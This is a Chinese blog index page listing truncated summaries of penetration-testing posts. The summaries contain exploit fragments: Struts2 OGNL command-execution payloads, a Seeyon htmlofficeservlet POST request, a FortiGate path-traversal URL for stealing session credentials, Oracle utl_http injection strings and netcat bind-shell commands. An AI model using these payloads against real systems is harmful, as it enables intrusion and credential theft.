摘要: 测试POC字典: redirect:%25{3*4} redirect%3A%24%7B3%2A4%7D action%3A%24%7B3%2A4%7D 执行命令: # 进行url编码 redirect:${#a=new java.lang.ProcessBuilder(new java.lang. 阅读全文
posted @ 2020-12-20 13:26 会HelloWorld的土拨鼠 阅读(209) 评论(0) 推荐(0)
摘要: 查询历史ip时发现好多个ip,判断有cdn,而最后一个ip记录时2017年,故该ip可能为真实ip 阅读全文
posted @ 2020-12-20 13:11 会HelloWorld的土拨鼠 阅读(97) 评论(0) 推荐(0)
摘要: 访问:http://xxxx/seeyon/htmlofficeservlet,看到 POC: POST /seeyon/htmlofficeservlet HTTP/1.1 Host: x.x.x.x Cache-Control: max-age=0 Upgrade-Insecure-Reques 阅读全文
posted @ 2020-12-20 11:30 会HelloWorld的土拨鼠 阅读(2157) 评论(0) 推荐(0)
摘要: 判断是否存在漏洞 http://x.x.x.x/login为正常页面 加入/;/仍未正常页面 访问http://x.x.x.x/;/aaaaaaa为404页面,则判断存在该漏洞, 利用该漏洞可绕过权限,访问后台的页面,如: 参考 https://xz.aliyun.com/t/7964 https: 阅读全文
posted @ 2020-12-09 22:22 会HelloWorld的土拨鼠 阅读(1466) 评论(0) 推荐(0)
摘要: web日志分析 # 查看前十条 head access.log # 查看日志多少行 wc -l access.log # 筛选ip cat access.log | cut -d " " -f 1 | sort -u # 筛选每个ip的访问次数 cat access.log | cut -d " " 阅读全文
posted @ 2020-12-08 21:21 会HelloWorld的土拨鼠 阅读(82) 评论(0) 推荐(0)
摘要: utl_http.request() # 判断是否支持utl_http.request 1 and exists (select count(*) from all_objects where object_name='UTL_HTTP') -- # 查询oracle版本 1 and utl_htt 阅读全文
posted @ 2020-12-08 21:15 会HelloWorld的土拨鼠 阅读(136) 评论(0) 推荐(0)
摘要: payload: https://x.x.x.x/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession 使用用户名密码,成功登陆 阅读全文
posted @ 2020-12-07 22:14 会HelloWorld的土拨鼠 阅读(5) 评论(0) 推荐(0)
摘要: netcat # 当作telnet端口指纹探测 nc -nv x.x.x.x 110 # 文件下载 # 服务端 nc -nlvp 4444 > tmp.exe # 客户端 nc -nv x.x.x.x 4444 < tmp.exe # 正向shell # 目标 nc -nlvp 4444 -e cm 阅读全文
posted @ 2020-12-07 22:01 会HelloWorld的土拨鼠 阅读(282) 评论(0) 推荐(0)
摘要: 搭建好的环境,及搭建所需要的镜像和软件,统一打包。 百度云地址:链接:https://pan.baidu.com/s/1RkLw5Yg3FxozHButbZ8d4A 密码:lpfh 阅读全文
posted @ 2020-12-03 19:20 会HelloWorld的土拨鼠 阅读(61) 评论(0) 推荐(0)
返回顶端